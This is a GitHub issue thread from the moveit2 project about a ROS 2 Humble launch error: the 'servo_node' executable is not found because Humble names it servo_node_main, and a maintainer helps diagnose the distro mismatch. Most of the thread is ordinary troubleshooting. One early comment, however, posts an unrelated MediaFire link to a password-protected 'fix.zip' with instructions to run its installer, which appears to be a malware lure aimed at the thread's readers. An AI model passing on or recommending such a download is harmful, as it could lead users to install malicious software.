moveit/moveit2 #2981: executable 'servo_node' not found on the libexec directory

PedroMoreo, 2024-08-26:
### Description

I have severals issues. I am trying to reproduce the hello moveit tutorial for universal robot 5 ur5e. For this purpose I am trying to update this project https://github.com/LucaBross/simple_moveit2_universal_robots_movement.git from ur3e to ur5e.

### Your environment
* ROS Distro: Humble (using ROS2)
* OS Version: e.g. Ubuntu 22.04
* Source or Binary build? 
* If binary, which release version?
* I am using a source version of MOVE IT https://github.com/moveit/moveit2_tutorials
* If source, which branch?
* I am using a binary version of ur_robot_driver according to https://docs.ros.org/en/ros2_packages/rolling/api/ur_robot_driver/installation/installation.html, since I cannot use the source version due to this issue https://github.com/UniversalRobots/Universal_Robots_ROS2_Driver/issues/1062
* Which RMW (Fast DDS or Cyclone DDS)? Humble or Rolling should be using Cyclone.

### Steps to reproduce
In a first shell I launch :

cd ~/ws_moveit2/
source ~/ws_moveit2/install/setup.bash
source /opt/ros/humble/setup.bash
ros2 launch ur_robot_driver ur_control.launch.py ur_type:=ur5e robot_ip:=172.17.0.2 launch_rviz:=false initial_joint_controller:=joint_trajectory_controller 

Also launch URSIM. After some secconds the shell answer is :

[ur_ros2_control_node-1] [INFO] [1724661734.114233192] [UR_Client_Library:]: Robot connected to reverse interface. Ready to receive control commands.

In a seccond shell 
source /opt/ros/humble/setup.bash
source ~/ws_moveit2/install/setup.bash   
ros2 launch ur_moveit_config ur_moveit.launch.py ur_type:=ur5e launch_rviz:=true

This is the error:

[INFO] [launch]: All log files can be found below /home/pedro/.ros/log/2024-08-26-10-55-04-926688-pedro-B650-AORUS-ELITE-AX-35224
[INFO] [launch]: Default logging verbosity is set to INFO
**[ERROR] [launch]: Caught exception in launch (see debug for traceback): executable 'servo_node' not found on the libexec directory '/home/pedro/ws_moveit2/install/moveit_servo/lib/moveit_servo'**

this is the content of the directory:

ls /home/pedro/ws_moveit2/install/moveit_servo/lib/moveit_servo
fake_command_publisher  servo_node_main  servo_pose_tracking_demo

I think the program is searching for a servo_node executable wich is the same has servo_node_main

### Expected behaviour
Tell us what should happen
Get the robot ready to receive commands.

### Actual behaviour
Tell us what happens instead
the controller for moveit stops

### Backtrace or Console output
ERROR] [launch]: Caught exception in launch (see debug for traceback): executable 'servo_node' not found on the libexec directory '/home/pedro/ws_moveit2/install/moveit_servo/lib/moveit_servo'*
Use [gist.github.com](gist.github.com) to copy-paste the console output or segfault backtrace using gdb.

I hope you can help.
Thanks

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sea-bass, 2024-08-27:
I think in Humble, this executable is called `servo_node_main` instead of `servo_node`.

If you look at the Humble branch of the `Universal_Robots_ROS2_Driver` repo, they also have it this way: https://github.com/UniversalRobots/Universal_Robots_ROS2_Driver/blob/humble/ur_moveit_config/launch/ur_moveit.launch.py#L246

So I think you might be mismatching ROS distros, and switching to the Humble version of the UR driver might be the best way to go?

PedroMoreo, 2024-08-27:
Thanks a lot Sebastián

In fact, In fact, copying and pasting the file, renaming it with no '_main' worked.

But I am checking the version of the ur_moveit (because this could be the main cause of other troubles), and you are right. My ur_moveit.launch.py is asking for moveit_servo and not moveit_servo_main

  # Servo node for realtime control
    servo_yaml = load_yaml("ur_moveit_config", "config/ur_servo.yaml")
    servo_params = {"moveit_servo": servo_yaml}
    servo_node = Node(
        **package="moveit_servo",**
        condition=IfCondition(launch_servo),
        executable="servo_node",
        parameters=[
            servo_params,
            robot_description,
            robot_description_semantic,
        ],
        output="screen",
    )

Also I checked the package.xml and I cannot find any information about the distro

<?xml version="1.0"?>
<?xml-model href="http://download.ros.org/schema/package_format3.xsd" schematypens="http://www.w3.org/2001/XMLSchema"?>
<package format="3">
  <name>ur_moveit_config</name>
  <version>2.4.4</version>
  <description>
     An example package with MoveIt2 configurations for UR robots.
  </description>
  <maintainer email="denis@stoglrobotics.de">Denis Stogl</maintainer>
  <maintainer email="exner@fzi.de">Felix Exner</maintainer>
  <maintainer email="wilbrandt@fzi.de">Robert Wilbrandt</maintainer>

  <license>Apache2.0</license>

  <author email="lovro.ivanov@gmail.com">Lovro Ivanov</author>
  <author email="zelenak@picknik.ai">Andy Zelenak</author>

  <buildtool_depend>ament_cmake</buildtool_depend>
  <buildtool_depend>ament_cmake_python</buildtool_depend>

  <exec_depend>launch</exec_depend>
  <exec_depend>launch_ros</exec_depend>
  <exec_depend>moveit_kinematics</exec_depend>
  <exec_depend>moveit_planners_ompl</exec_depend>
  <exec_depend>moveit_ros_move_group</exec_depend>
  <exec_depend>moveit_ros_visualization</exec_depend>
  <exec_depend>moveit_servo</exec_depend>
  <exec_depend>moveit_simple_controller_manager</exec_depend>
  <exec_depend>rviz2</exec_depend>
  <exec_depend>ur_description</exec_depend>
  <exec_depend>urdf</exec_depend>
  <exec_depend>warehouse_ros_sqlite</exec_depend>
  <exec_depend>xacro</exec_depend>

  <export>
    <build_type>ament_cmake</build_type>
  </export>
</package>

Maybe the best solution could be start another workspace clean.

sea-bass, 2024-08-27:
It may also be that you have a binary install of the `ur_moveit_config` package, which is in conflict with your source build?

You can check with `apt list --installed | grep ur_moveit_config`

And if you want to remove it, `sudo apt remove ros-humble-ur-moveit-config` (and replace `remove` with `install` otherwise)

PedroMoreo, 2024-08-27:
Thanks again

According to the instruccion `apt list --installed | grep ur_moveit_config`  moveit is not installaed as binary, since the result is empty.

Using the instruccion ros2 pkg prefix `ur_moveit_config` and ros2 pkg prefix `ur_robot_driver` 
we can find 
```
ur_robot_driver --> /opt/ros/humble
ur_moveit_config --> /home/pedro/install/ur_moveit_config
```
I will try now the binary version of moveit-config.

sea-bass, 2024-08-28:
Great to hear!

closed 2024-08-28 by sea-bass